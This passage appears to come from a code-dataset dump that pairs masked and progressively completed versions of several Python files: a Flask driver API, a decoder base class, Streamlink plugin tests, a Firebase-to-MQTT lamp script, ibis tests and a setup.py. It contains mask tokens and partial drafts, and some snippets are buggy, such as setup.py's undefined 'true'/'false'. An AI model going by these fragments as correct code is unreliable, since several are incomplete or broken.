driver_schema.dump(driver, many=True).data\n return custom_response(response, 200)\n\n\ndef custom_response(response, status_code):\n return Response(mimetype='application/json', response=json.dumps(\n response), status=status_code)\n",
"step-5": "from flask import request, json, Response, Blueprint\nfrom ..models.DriverModel import DriverModel, DriverSchema\n\ndriver_api = Blueprint('drivers', __name__)\ndriver_schema = DriverSchema()\n\n\n@driver_api.route('/', methods=['POST'])\ndef create():\n req_data = request.get_json()\n data, error = driver_schema.load(req_data)\n\n if error:\n return custom_response(error, 400)\n\n driver_in_db = DriverModel.get_driver_by_name(data.get('name'))\n if driver_in_db:\n return custom_response({'Error': 'Driver already exist.'}, 400)\n\n driver = DriverModel(data)\n driver.save()\n\n response = driver_schema.dump(driver).data\n return custom_response(response, 201)\n\n\n@driver_api.route('/<int:driver_id>', methods=['GET'])\ndef get(driver_id):\n driver = DriverModel.get_one_driver(driver_id)\n if not driver:\n return custom_response({'Error': 'Driver not found.'}, 404)\n\n response = driver_schema.dump(driver).data\n return custom_response(response, 200)\n\n\n@driver_api.route('/<int:driver_id>', methods=['PUT'])\ndef update(driver_id):\n req_data = request.get_json()\n data, error = driver_schema.load(req_data, partial=True)\n if error:\n return custom_response({'Error': 'Driver not found.'}, 400)\n\n driver = DriverModel.get_one_driver(driver_id)\n driver.update(data)\n\n response = driver_schema.dump(driver).data\n return custom_response(response, 200)\n\n\n@driver_api.route('/<int:driver_id>', methods=['DELETE'])\ndef delete(driver_id):\n driver = DriverModel.get_one_driver(driver_id)\n if not driver:\n return custom_response({'Error': 'Driver not found.'}, 400)\n\n driver.delete()\n return custom_response({'Sucess': 'Driver deleted with sucess!'}, 200)\n\n\n@driver_api.route('/list_not_loaded', methods=['GET'])\ndef list_truck_not_loaded():\n driver = DriverModel.truck_not_loaded()\n\n response = driver_schema.dump(driver, many=True).data\n return custom_response(response, 200)\n\n\n@driver_api.route('/list_trucks_owned', methods=['GET'])\ndef list_truck_owned():\n driver = DriverModel.truck_owned()\n\n response = driver_schema.dump(driver, many=True).data\n return custom_response(response, 200)\n\n\ndef custom_response(response, status_code):\n return Response(\n mimetype=\"application/json\",\n response=json.dumps(response),\n status=status_code\n )\n",
"step-ids": [
2,
5,
7,
9,
10
]
}
|
[
2,
5,
7,
9,
10
] |
<|reserved_special_token_0|>
class DecoderBase(object):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __init__(self):
self._predictor = 'decoder'
self._label = None
pass
@abstractmethod
def set_label(self, label):
self._label = label
<|reserved_special_token_0|>
@abstractmethod
def loss(self, input_data):
pass
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class DecoderBase(object):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __init__(self):
self._predictor = 'decoder'
self._label = None
pass
@abstractmethod
def set_label(self, label):
self._label = label
<|reserved_special_token_0|>
@abstractmethod
def loss(self, input_data):
pass
@abstractmethod
def sequence_dist(self, input_data):
pass
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class DecoderBase(object):
<|reserved_special_token_0|>
__metaclass__ = ABCMeta
def __init__(self):
self._predictor = 'decoder'
self._label = None
pass
@abstractmethod
def set_label(self, label):
self._label = label
@abstractmethod
def predict(self, input_data):
pass
@abstractmethod
def loss(self, input_data):
pass
@abstractmethod
def sequence_dist(self, input_data):
pass
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class DecoderBase(object):
"""
Base model for decoder
"""
__metaclass__ = ABCMeta
def __init__(self):
self._predictor = 'decoder'
self._label = None
pass
@abstractmethod
def set_label(self, label):
self._label = label
@abstractmethod
def predict(self, input_data):
pass
@abstractmethod
def loss(self, input_data):
pass
@abstractmethod
def sequence_dist(self, input_data):
pass
<|reserved_special_token_1|>
#!/usr/bin/python3
# encoding: utf-8
"""
@author: ShuoChang
@license: (C) MIT.
@contact: [email protected]
@software: CRNN_STN_SEQ
@file: decoder_base.py
@time: 2019/7/22 17:21
@blog: https://www.zhihu.com/people/chang-shuo-59/activities
"""
from abc import ABCMeta
from abc import abstractmethod
class DecoderBase(object):
"""
Base model for decoder
"""
__metaclass__ = ABCMeta
def __init__(self):
self._predictor = 'decoder'
self._label = None
pass
@abstractmethod
def set_label(self, label):
self._label = label
@abstractmethod
def predict(self, input_data):
pass
@abstractmethod
def loss(self, input_data):
pass
@abstractmethod
def sequence_dist(self, input_data):
pass
|
flexible
|
{
"blob_id": "0d8a26ef4077b40e8255d5bb2ce9217b51118780",
"index": 7364,
"step-1": "<mask token>\n\n\nclass DecoderBase(object):\n <mask token>\n <mask token>\n\n def __init__(self):\n self._predictor = 'decoder'\n self._label = None\n pass\n\n @abstractmethod\n def set_label(self, label):\n self._label = label\n <mask token>\n\n @abstractmethod\n def loss(self, input_data):\n pass\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass DecoderBase(object):\n <mask token>\n <mask token>\n\n def __init__(self):\n self._predictor = 'decoder'\n self._label = None\n pass\n\n @abstractmethod\n def set_label(self, label):\n self._label = label\n <mask token>\n\n @abstractmethod\n def loss(self, input_data):\n pass\n\n @abstractmethod\n def sequence_dist(self, input_data):\n pass\n",
"step-3": "<mask token>\n\n\nclass DecoderBase(object):\n <mask token>\n __metaclass__ = ABCMeta\n\n def __init__(self):\n self._predictor = 'decoder'\n self._label = None\n pass\n\n @abstractmethod\n def set_label(self, label):\n self._label = label\n\n @abstractmethod\n def predict(self, input_data):\n pass\n\n @abstractmethod\n def loss(self, input_data):\n pass\n\n @abstractmethod\n def sequence_dist(self, input_data):\n pass\n",
"step-4": "<mask token>\n\n\nclass DecoderBase(object):\n \"\"\"\n Base model for decoder\n \"\"\"\n __metaclass__ = ABCMeta\n\n def __init__(self):\n self._predictor = 'decoder'\n self._label = None\n pass\n\n @abstractmethod\n def set_label(self, label):\n self._label = label\n\n @abstractmethod\n def predict(self, input_data):\n pass\n\n @abstractmethod\n def loss(self, input_data):\n pass\n\n @abstractmethod\n def sequence_dist(self, input_data):\n pass\n",
"step-5": "#!/usr/bin/python3\n# encoding: utf-8\n\"\"\"\n@author: ShuoChang\n@license: (C) MIT.\n@contact: [email protected]\n@software: CRNN_STN_SEQ\n@file: decoder_base.py\n@time: 2019/7/22 17:21\n@blog: https://www.zhihu.com/people/chang-shuo-59/activities\n\"\"\"\n\nfrom abc import ABCMeta\nfrom abc import abstractmethod\n\n\nclass DecoderBase(object):\n \"\"\"\n Base model for decoder\n \"\"\"\n __metaclass__ = ABCMeta\n\n def __init__(self):\n self._predictor = 'decoder'\n self._label = None\n pass\n\n @abstractmethod\n def set_label(self, label):\n self._label = label\n\n @abstractmethod\n def predict(self, input_data):\n pass\n\n @abstractmethod\n def loss(self, input_data):\n pass\n\n @abstractmethod\n def sequence_dist(self, input_data):\n pass\n",
"step-ids": [
4,
5,
7,
8,
10
]
}
|
[
4,
5,
7,
8,
10
] |
<|reserved_special_token_0|>
class TestPluginFunimationNow(unittest.TestCase):
def test_arguments(self):
from streamlink_cli.main import setup_plugin_args
session = Streamlink()
parser = MagicMock()
group = parser.add_argument_group('Plugin Options').add_argument_group(
'FunimationNow')
session.plugins = {'funimationnow': FunimationNow}
setup_plugin_args(session, parser)
self.assertSequenceEqual(group.add_argument.mock_calls, [call(
'--funimation-email', help=ANY), call('--funimation-password',
help=ANY), call('--funimation-language', choices=['en', 'ja',
'english', 'japanese'], default='english', help=ANY)])
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestPluginCanHandleUrlFunimationNow(PluginCanHandleUrl):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class TestPluginFunimationNow(unittest.TestCase):
def test_arguments(self):
from streamlink_cli.main import setup_plugin_args
session = Streamlink()
parser = MagicMock()
group = parser.add_argument_group('Plugin Options').add_argument_group(
'FunimationNow')
session.plugins = {'funimationnow': FunimationNow}
setup_plugin_args(session, parser)
self.assertSequenceEqual(group.add_argument.mock_calls, [call(
'--funimation-email', help=ANY), call('--funimation-password',
help=ANY), call('--funimation-language', choices=['en', 'ja',
'english', 'japanese'], default='english', help=ANY)])
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestPluginCanHandleUrlFunimationNow(PluginCanHandleUrl):
__plugin__ = FunimationNow
should_match = ['http://www.funimation.com/anything',
'http://www.funimation.com/anything123',
'http://www.funimationnow.uk/anything',
'http://www.funimationnow.uk/anything123']
class TestPluginFunimationNow(unittest.TestCase):
def test_arguments(self):
from streamlink_cli.main import setup_plugin_args
session = Streamlink()
parser = MagicMock()
group = parser.add_argument_group('Plugin Options').add_argument_group(
'FunimationNow')
session.plugins = {'funimationnow': FunimationNow}
setup_plugin_args(session, parser)
self.assertSequenceEqual(group.add_argument.mock_calls, [call(
'--funimation-email', help=ANY), call('--funimation-password',
help=ANY), call('--funimation-language', choices=['en', 'ja',
'english', 'japanese'], default='english', help=ANY)])
<|reserved_special_token_1|>
import unittest
from unittest.mock import ANY, MagicMock, call
from streamlink import Streamlink
from streamlink.plugins.funimationnow import FunimationNow
from tests.plugins import PluginCanHandleUrl
class TestPluginCanHandleUrlFunimationNow(PluginCanHandleUrl):
__plugin__ = FunimationNow
should_match = ['http://www.funimation.com/anything',
'http://www.funimation.com/anything123',
'http://www.funimationnow.uk/anything',
'http://www.funimationnow.uk/anything123']
class TestPluginFunimationNow(unittest.TestCase):
def test_arguments(self):
from streamlink_cli.main import setup_plugin_args
session = Streamlink()
parser = MagicMock()
group = parser.add_argument_group('Plugin Options').add_argument_group(
'FunimationNow')
session.plugins = {'funimationnow': FunimationNow}
setup_plugin_args(session, parser)
self.assertSequenceEqual(group.add_argument.mock_calls, [call(
'--funimation-email', help=ANY), call('--funimation-password',
help=ANY), call('--funimation-language', choices=['en', 'ja',
'english', 'japanese'], default='english', help=ANY)])
<|reserved_special_token_1|>
import unittest
from unittest.mock import ANY, MagicMock, call
from streamlink import Streamlink
from streamlink.plugins.funimationnow import FunimationNow
from tests.plugins import PluginCanHandleUrl
class TestPluginCanHandleUrlFunimationNow(PluginCanHandleUrl):
__plugin__ = FunimationNow
should_match = [
"http://www.funimation.com/anything",
"http://www.funimation.com/anything123",
"http://www.funimationnow.uk/anything",
"http://www.funimationnow.uk/anything123",
]
class TestPluginFunimationNow(unittest.TestCase):
def test_arguments(self):
from streamlink_cli.main import setup_plugin_args
session = Streamlink()
parser = MagicMock()
group = parser.add_argument_group("Plugin Options").add_argument_group("FunimationNow")
session.plugins = {
'funimationnow': FunimationNow
}
setup_plugin_args(session, parser)
self.assertSequenceEqual(
group.add_argument.mock_calls,
[
call('--funimation-email', help=ANY),
call('--funimation-password', help=ANY),
call('--funimation-language', choices=["en", "ja", "english", "japanese"], default="english", help=ANY)
]
)
|
flexible
|
{
"blob_id": "266add60be2b6c2de5d53504cbabf754aa62d1b0",
"index": 9806,
"step-1": "<mask token>\n\n\nclass TestPluginFunimationNow(unittest.TestCase):\n\n def test_arguments(self):\n from streamlink_cli.main import setup_plugin_args\n session = Streamlink()\n parser = MagicMock()\n group = parser.add_argument_group('Plugin Options').add_argument_group(\n 'FunimationNow')\n session.plugins = {'funimationnow': FunimationNow}\n setup_plugin_args(session, parser)\n self.assertSequenceEqual(group.add_argument.mock_calls, [call(\n '--funimation-email', help=ANY), call('--funimation-password',\n help=ANY), call('--funimation-language', choices=['en', 'ja',\n 'english', 'japanese'], default='english', help=ANY)])\n",
"step-2": "<mask token>\n\n\nclass TestPluginCanHandleUrlFunimationNow(PluginCanHandleUrl):\n <mask token>\n <mask token>\n\n\nclass TestPluginFunimationNow(unittest.TestCase):\n\n def test_arguments(self):\n from streamlink_cli.main import setup_plugin_args\n session = Streamlink()\n parser = MagicMock()\n group = parser.add_argument_group('Plugin Options').add_argument_group(\n 'FunimationNow')\n session.plugins = {'funimationnow': FunimationNow}\n setup_plugin_args(session, parser)\n self.assertSequenceEqual(group.add_argument.mock_calls, [call(\n '--funimation-email', help=ANY), call('--funimation-password',\n help=ANY), call('--funimation-language', choices=['en', 'ja',\n 'english', 'japanese'], default='english', help=ANY)])\n",
"step-3": "<mask token>\n\n\nclass TestPluginCanHandleUrlFunimationNow(PluginCanHandleUrl):\n __plugin__ = FunimationNow\n should_match = ['http://www.funimation.com/anything',\n 'http://www.funimation.com/anything123',\n 'http://www.funimationnow.uk/anything',\n 'http://www.funimationnow.uk/anything123']\n\n\nclass TestPluginFunimationNow(unittest.TestCase):\n\n def test_arguments(self):\n from streamlink_cli.main import setup_plugin_args\n session = Streamlink()\n parser = MagicMock()\n group = parser.add_argument_group('Plugin Options').add_argument_group(\n 'FunimationNow')\n session.plugins = {'funimationnow': FunimationNow}\n setup_plugin_args(session, parser)\n self.assertSequenceEqual(group.add_argument.mock_calls, [call(\n '--funimation-email', help=ANY), call('--funimation-password',\n help=ANY), call('--funimation-language', choices=['en', 'ja',\n 'english', 'japanese'], default='english', help=ANY)])\n",
"step-4": "import unittest\nfrom unittest.mock import ANY, MagicMock, call\nfrom streamlink import Streamlink\nfrom streamlink.plugins.funimationnow import FunimationNow\nfrom tests.plugins import PluginCanHandleUrl\n\n\nclass TestPluginCanHandleUrlFunimationNow(PluginCanHandleUrl):\n __plugin__ = FunimationNow\n should_match = ['http://www.funimation.com/anything',\n 'http://www.funimation.com/anything123',\n 'http://www.funimationnow.uk/anything',\n 'http://www.funimationnow.uk/anything123']\n\n\nclass TestPluginFunimationNow(unittest.TestCase):\n\n def test_arguments(self):\n from streamlink_cli.main import setup_plugin_args\n session = Streamlink()\n parser = MagicMock()\n group = parser.add_argument_group('Plugin Options').add_argument_group(\n 'FunimationNow')\n session.plugins = {'funimationnow': FunimationNow}\n setup_plugin_args(session, parser)\n self.assertSequenceEqual(group.add_argument.mock_calls, [call(\n '--funimation-email', help=ANY), call('--funimation-password',\n help=ANY), call('--funimation-language', choices=['en', 'ja',\n 'english', 'japanese'], default='english', help=ANY)])\n",
"step-5": "import unittest\nfrom unittest.mock import ANY, MagicMock, call\n\nfrom streamlink import Streamlink\nfrom streamlink.plugins.funimationnow import FunimationNow\nfrom tests.plugins import PluginCanHandleUrl\n\n\nclass TestPluginCanHandleUrlFunimationNow(PluginCanHandleUrl):\n __plugin__ = FunimationNow\n\n should_match = [\n \"http://www.funimation.com/anything\",\n \"http://www.funimation.com/anything123\",\n \"http://www.funimationnow.uk/anything\",\n \"http://www.funimationnow.uk/anything123\",\n ]\n\n\nclass TestPluginFunimationNow(unittest.TestCase):\n def test_arguments(self):\n from streamlink_cli.main import setup_plugin_args\n session = Streamlink()\n parser = MagicMock()\n group = parser.add_argument_group(\"Plugin Options\").add_argument_group(\"FunimationNow\")\n\n session.plugins = {\n 'funimationnow': FunimationNow\n }\n\n setup_plugin_args(session, parser)\n self.assertSequenceEqual(\n group.add_argument.mock_calls,\n [\n call('--funimation-email', help=ANY),\n call('--funimation-password', help=ANY),\n call('--funimation-language', choices=[\"en\", \"ja\", \"english\", \"japanese\"], default=\"english\", help=ANY)\n ]\n )\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
firebase_admin.initialize_app(cred, {'databaseURL':
'https://mikro-b4844.firebaseio.com/'})
<|reserved_special_token_0|>
print(ref.get())
<|reserved_special_token_0|>
while True:
print(ref.get())
if ref.get() == 'Off' and i == 0:
i = 1
client = mqtt.Client()
client.connect('127.0.0.1', 1883, 60)
client.publish('building/lampu', 'Off')
if ref.get() == 'On' and i == 1:
i = 0
client = mqtt.Client()
client.connect('127.0.0.1', 1883, 60)
client.publish('building/lampu', 'On')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
cred = credentials.Certificate('iot_mikro.json')
firebase_admin.initialize_app(cred, {'databaseURL':
'https://mikro-b4844.firebaseio.com/'})
ref = db.reference('lampu')
print(ref.get())
i = 0
while True:
print(ref.get())
if ref.get() == 'Off' and i == 0:
i = 1
client = mqtt.Client()
client.connect('127.0.0.1', 1883, 60)
client.publish('building/lampu', 'Off')
if ref.get() == 'On' and i == 1:
i = 0
client = mqtt.Client()
client.connect('127.0.0.1', 1883, 60)
client.publish('building/lampu', 'On')
<|reserved_special_token_1|>
import firebase_admin
from firebase_admin import credentials
from firebase_admin import db
import paho.mqtt.client as mqtt
cred = credentials.Certificate('iot_mikro.json')
firebase_admin.initialize_app(cred, {'databaseURL':
'https://mikro-b4844.firebaseio.com/'})
ref = db.reference('lampu')
print(ref.get())
i = 0
while True:
print(ref.get())
if ref.get() == 'Off' and i == 0:
i = 1
client = mqtt.Client()
client.connect('127.0.0.1', 1883, 60)
client.publish('building/lampu', 'Off')
if ref.get() == 'On' and i == 1:
i = 0
client = mqtt.Client()
client.connect('127.0.0.1', 1883, 60)
client.publish('building/lampu', 'On')
<|reserved_special_token_1|>
import firebase_admin
from firebase_admin import credentials
from firebase_admin import db
import paho.mqtt.client as mqtt
# Fetch the service account key JSON file contents
cred = credentials.Certificate('iot_mikro.json')
# Initialize the app with a service account, granting admin privileges
firebase_admin.initialize_app(cred, {
'databaseURL': 'https://mikro-b4844.firebaseio.com/'
})
ref = db.reference('lampu')
print(ref.get())
i=0
while True:
print(ref.get())
if ref.get()=="Off" and i==0 :
i=1
client = mqtt.Client()
client.connect("127.0.0.1",1883,60)
client.publish("building/lampu", "Off")
if ref.get()=="On" and i==1 :
i=0
client = mqtt.Client()
client.connect("127.0.0.1",1883,60)
client.publish("building/lampu", "On")
# client.disconnect();
|
flexible
|
{
"blob_id": "acff8618754658104ac36214901d346447a0134f",
"index": 811,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfirebase_admin.initialize_app(cred, {'databaseURL':\n 'https://mikro-b4844.firebaseio.com/'})\n<mask token>\nprint(ref.get())\n<mask token>\nwhile True:\n print(ref.get())\n if ref.get() == 'Off' and i == 0:\n i = 1\n client = mqtt.Client()\n client.connect('127.0.0.1', 1883, 60)\n client.publish('building/lampu', 'Off')\n if ref.get() == 'On' and i == 1:\n i = 0\n client = mqtt.Client()\n client.connect('127.0.0.1', 1883, 60)\n client.publish('building/lampu', 'On')\n",
"step-3": "<mask token>\ncred = credentials.Certificate('iot_mikro.json')\nfirebase_admin.initialize_app(cred, {'databaseURL':\n 'https://mikro-b4844.firebaseio.com/'})\nref = db.reference('lampu')\nprint(ref.get())\ni = 0\nwhile True:\n print(ref.get())\n if ref.get() == 'Off' and i == 0:\n i = 1\n client = mqtt.Client()\n client.connect('127.0.0.1', 1883, 60)\n client.publish('building/lampu', 'Off')\n if ref.get() == 'On' and i == 1:\n i = 0\n client = mqtt.Client()\n client.connect('127.0.0.1', 1883, 60)\n client.publish('building/lampu', 'On')\n",
"step-4": "import firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import db\nimport paho.mqtt.client as mqtt\ncred = credentials.Certificate('iot_mikro.json')\nfirebase_admin.initialize_app(cred, {'databaseURL':\n 'https://mikro-b4844.firebaseio.com/'})\nref = db.reference('lampu')\nprint(ref.get())\ni = 0\nwhile True:\n print(ref.get())\n if ref.get() == 'Off' and i == 0:\n i = 1\n client = mqtt.Client()\n client.connect('127.0.0.1', 1883, 60)\n client.publish('building/lampu', 'Off')\n if ref.get() == 'On' and i == 1:\n i = 0\n client = mqtt.Client()\n client.connect('127.0.0.1', 1883, 60)\n client.publish('building/lampu', 'On')\n",
"step-5": "import firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import db\nimport paho.mqtt.client as mqtt\n\n# Fetch the service account key JSON file contents\ncred = credentials.Certificate('iot_mikro.json')\n# Initialize the app with a service account, granting admin privileges\nfirebase_admin.initialize_app(cred, {\n 'databaseURL': 'https://mikro-b4844.firebaseio.com/'\n})\n\nref = db.reference('lampu')\nprint(ref.get())\ni=0\nwhile True:\n print(ref.get())\n if ref.get()==\"Off\" and i==0 :\n i=1\n client = mqtt.Client()\n client.connect(\"127.0.0.1\",1883,60)\n client.publish(\"building/lampu\", \"Off\")\n if ref.get()==\"On\" and i==1 :\n i=0\n client = mqtt.Client()\n client.connect(\"127.0.0.1\",1883,60)\n client.publish(\"building/lampu\", \"On\")\n# client.disconnect();\n ",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from __future__ import annotations
import ibis
from ibis import _
def test_format_sql_query_result(con, snapshot):
t = con.table("airlines")
query = """
SELECT carrier, mean(arrdelay) AS avg_arrdelay
FROM airlines
GROUP BY 1
ORDER BY 2 DESC
"""
schema = ibis.schema({"carrier": "string", "avg_arrdelay": "double"})
with con.set_query_schema(query, schema):
expr = t.sql(query)
# name is autoincremented so we need to set it manually to make the
# snapshot stable
expr = expr.op().copy(name="foo").to_expr()
expr = expr.mutate(
island=_.carrier.lower(),
avg_arrdelay=_.avg_arrdelay.round(1),
)
snapshot.assert_match(repr(expr), "repr.txt")
def test_memoize_database_table(con, snapshot):
table = con.table("test1")
table2 = con.table("test2")
filter_pred = table["f"] > 0
table3 = table[filter_pred]
join_pred = table3["g"] == table2["key"]
joined = table2.inner_join(table3, [join_pred])
met1 = (table3["f"] - table2["value"]).mean().name("foo")
expr = joined.aggregate(
[met1, table3["f"].sum().name("bar")], by=[table3["g"], table2["key"]]
)
result = repr(expr)
assert result.count("test1") == 1
assert result.count("test2") == 1
snapshot.assert_match(result, "repr.txt")
def test_memoize_insert_sort_key(con, snapshot):
table = con.table("airlines")
t = table["arrdelay", "dest"]
expr = t.group_by("dest").mutate(
dest_avg=t.arrdelay.mean(), dev=t.arrdelay - t.arrdelay.mean()
)
worst = expr[expr.dev.notnull()].order_by(ibis.desc("dev")).limit(10)
result = repr(worst)
assert result.count("airlines") == 1
snapshot.assert_match(result, "repr.txt")
|
normal
|
{
"blob_id": "97ff8dae060475b0efbc8d39e9fc251be8ac091b",
"index": 6264,
"step-1": "<mask token>\n\n\ndef test_memoize_insert_sort_key(con, snapshot):\n table = con.table('airlines')\n t = table['arrdelay', 'dest']\n expr = t.group_by('dest').mutate(dest_avg=t.arrdelay.mean(), dev=t.\n arrdelay - t.arrdelay.mean())\n worst = expr[expr.dev.notnull()].order_by(ibis.desc('dev')).limit(10)\n result = repr(worst)\n assert result.count('airlines') == 1\n snapshot.assert_match(result, 'repr.txt')\n",
"step-2": "<mask token>\n\n\ndef test_format_sql_query_result(con, snapshot):\n t = con.table('airlines')\n query = \"\"\"\n SELECT carrier, mean(arrdelay) AS avg_arrdelay\n FROM airlines\n GROUP BY 1\n ORDER BY 2 DESC\n \"\"\"\n schema = ibis.schema({'carrier': 'string', 'avg_arrdelay': 'double'})\n with con.set_query_schema(query, schema):\n expr = t.sql(query)\n expr = expr.op().copy(name='foo').to_expr()\n expr = expr.mutate(island=_.carrier.lower(), avg_arrdelay=_.\n avg_arrdelay.round(1))\n snapshot.assert_match(repr(expr), 'repr.txt')\n\n\n<mask token>\n\n\ndef test_memoize_insert_sort_key(con, snapshot):\n table = con.table('airlines')\n t = table['arrdelay', 'dest']\n expr = t.group_by('dest').mutate(dest_avg=t.arrdelay.mean(), dev=t.\n arrdelay - t.arrdelay.mean())\n worst = expr[expr.dev.notnull()].order_by(ibis.desc('dev')).limit(10)\n result = repr(worst)\n assert result.count('airlines') == 1\n snapshot.assert_match(result, 'repr.txt')\n",
"step-3": "<mask token>\n\n\ndef test_format_sql_query_result(con, snapshot):\n t = con.table('airlines')\n query = \"\"\"\n SELECT carrier, mean(arrdelay) AS avg_arrdelay\n FROM airlines\n GROUP BY 1\n ORDER BY 2 DESC\n \"\"\"\n schema = ibis.schema({'carrier': 'string', 'avg_arrdelay': 'double'})\n with con.set_query_schema(query, schema):\n expr = t.sql(query)\n expr = expr.op().copy(name='foo').to_expr()\n expr = expr.mutate(island=_.carrier.lower(), avg_arrdelay=_.\n avg_arrdelay.round(1))\n snapshot.assert_match(repr(expr), 'repr.txt')\n\n\ndef test_memoize_database_table(con, snapshot):\n table = con.table('test1')\n table2 = con.table('test2')\n filter_pred = table['f'] > 0\n table3 = table[filter_pred]\n join_pred = table3['g'] == table2['key']\n joined = table2.inner_join(table3, [join_pred])\n met1 = (table3['f'] - table2['value']).mean().name('foo')\n expr = joined.aggregate([met1, table3['f'].sum().name('bar')], by=[\n table3['g'], table2['key']])\n result = repr(expr)\n assert result.count('test1') == 1\n assert result.count('test2') == 1\n snapshot.assert_match(result, 'repr.txt')\n\n\ndef test_memoize_insert_sort_key(con, snapshot):\n table = con.table('airlines')\n t = table['arrdelay', 'dest']\n expr = t.group_by('dest').mutate(dest_avg=t.arrdelay.mean(), dev=t.\n arrdelay - t.arrdelay.mean())\n worst = expr[expr.dev.notnull()].order_by(ibis.desc('dev')).limit(10)\n result = repr(worst)\n assert result.count('airlines') == 1\n snapshot.assert_match(result, 'repr.txt')\n",
"step-4": "from __future__ import annotations\nimport ibis\nfrom ibis import _\n\n\ndef test_format_sql_query_result(con, snapshot):\n t = con.table('airlines')\n query = \"\"\"\n SELECT carrier, mean(arrdelay) AS avg_arrdelay\n FROM airlines\n GROUP BY 1\n ORDER BY 2 DESC\n \"\"\"\n schema = ibis.schema({'carrier': 'string', 'avg_arrdelay': 'double'})\n with con.set_query_schema(query, schema):\n expr = t.sql(query)\n expr = expr.op().copy(name='foo').to_expr()\n expr = expr.mutate(island=_.carrier.lower(), avg_arrdelay=_.\n avg_arrdelay.round(1))\n snapshot.assert_match(repr(expr), 'repr.txt')\n\n\ndef test_memoize_database_table(con, snapshot):\n table = con.table('test1')\n table2 = con.table('test2')\n filter_pred = table['f'] > 0\n table3 = table[filter_pred]\n join_pred = table3['g'] == table2['key']\n joined = table2.inner_join(table3, [join_pred])\n met1 = (table3['f'] - table2['value']).mean().name('foo')\n expr = joined.aggregate([met1, table3['f'].sum().name('bar')], by=[\n table3['g'], table2['key']])\n result = repr(expr)\n assert result.count('test1') == 1\n assert result.count('test2') == 1\n snapshot.assert_match(result, 'repr.txt')\n\n\ndef test_memoize_insert_sort_key(con, snapshot):\n table = con.table('airlines')\n t = table['arrdelay', 'dest']\n expr = t.group_by('dest').mutate(dest_avg=t.arrdelay.mean(), dev=t.\n arrdelay - t.arrdelay.mean())\n worst = expr[expr.dev.notnull()].order_by(ibis.desc('dev')).limit(10)\n result = repr(worst)\n assert result.count('airlines') == 1\n snapshot.assert_match(result, 'repr.txt')\n",
"step-5": "from __future__ import annotations\n\nimport ibis\nfrom ibis import _\n\n\ndef test_format_sql_query_result(con, snapshot):\n t = con.table(\"airlines\")\n\n query = \"\"\"\n SELECT carrier, mean(arrdelay) AS avg_arrdelay\n FROM airlines\n GROUP BY 1\n ORDER BY 2 DESC\n \"\"\"\n schema = ibis.schema({\"carrier\": \"string\", \"avg_arrdelay\": \"double\"})\n\n with con.set_query_schema(query, schema):\n expr = t.sql(query)\n # name is autoincremented so we need to set it manually to make the\n # snapshot stable\n expr = expr.op().copy(name=\"foo\").to_expr()\n\n expr = expr.mutate(\n island=_.carrier.lower(),\n avg_arrdelay=_.avg_arrdelay.round(1),\n )\n\n snapshot.assert_match(repr(expr), \"repr.txt\")\n\n\ndef test_memoize_database_table(con, snapshot):\n table = con.table(\"test1\")\n table2 = con.table(\"test2\")\n\n filter_pred = table[\"f\"] > 0\n table3 = table[filter_pred]\n join_pred = table3[\"g\"] == table2[\"key\"]\n\n joined = table2.inner_join(table3, [join_pred])\n\n met1 = (table3[\"f\"] - table2[\"value\"]).mean().name(\"foo\")\n expr = joined.aggregate(\n [met1, table3[\"f\"].sum().name(\"bar\")], by=[table3[\"g\"], table2[\"key\"]]\n )\n\n result = repr(expr)\n assert result.count(\"test1\") == 1\n assert result.count(\"test2\") == 1\n\n snapshot.assert_match(result, \"repr.txt\")\n\n\ndef test_memoize_insert_sort_key(con, snapshot):\n table = con.table(\"airlines\")\n\n t = table[\"arrdelay\", \"dest\"]\n expr = t.group_by(\"dest\").mutate(\n dest_avg=t.arrdelay.mean(), dev=t.arrdelay - t.arrdelay.mean()\n )\n\n worst = expr[expr.dev.notnull()].order_by(ibis.desc(\"dev\")).limit(10)\n\n result = repr(worst)\n assert result.count(\"airlines\") == 1\n\n snapshot.assert_match(result, \"repr.txt\")\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
try:
from setuptools import setup
from setuptools import find_packages
has_setup_tools = true
except ImportError:
from distutils.core import setup
has_setup_tools = false
with open('README.md', 'r') as fh:
long_description = fh.read()
if has_setup_tools is True:
packages = setuptools.find_packages()
else:
packages = ['otmux']
setup(name='otmux', version='__version', description=
'multiple remote activities using ssh and tmux', long_description=
long_description, url='https://github.com/rda3mon/otmux', author=
'Mallikarjun', author_email='[email protected]', license=
'Apache License 2.0', packages=['otmux'], classifiers=[
'Topic :: tmux :: ssh',
'Development Status :: 2 - Experimental/Unstable',
'Environment :: Console', 'License :: Apache License 2.0',
'Programming Language :: Python :: 2.7',
'Operating System :: OS Independent'])
<|reserved_special_token_1|>
try:
from setuptools import setup
from setuptools import find_packages
has_setup_tools = true
except ImportError:
from distutils.core import setup
has_setup_tools = false
with open("README.md", "r") as fh:
long_description = fh.read()
if has_setup_tools is True:
packages = setuptools.find_packages()
else:
packages = ["otmux"]
setup(
name="otmux",
version="__version",
description="multiple remote activities using ssh and tmux",
long_description=long_description,
url="https://github.com/rda3mon/otmux",
author="Mallikarjun",
author_email="[email protected]",
license="Apache License 2.0",
packages=["otmux"],
classifiers=[
'Topic :: tmux :: ssh',
'Development Status :: 2 - Experimental/Unstable',
'Environment :: Console',
'License :: Apache License 2.0',
'Programming Language :: Python :: 2.7',
"Operating System :: OS Independent"
]
)
|
flexible
|
{
"blob_id": "5d988d159902e4a4cb17ee0ec61153de2dda4691",
"index": 9120,
"step-1": "<mask token>\n",
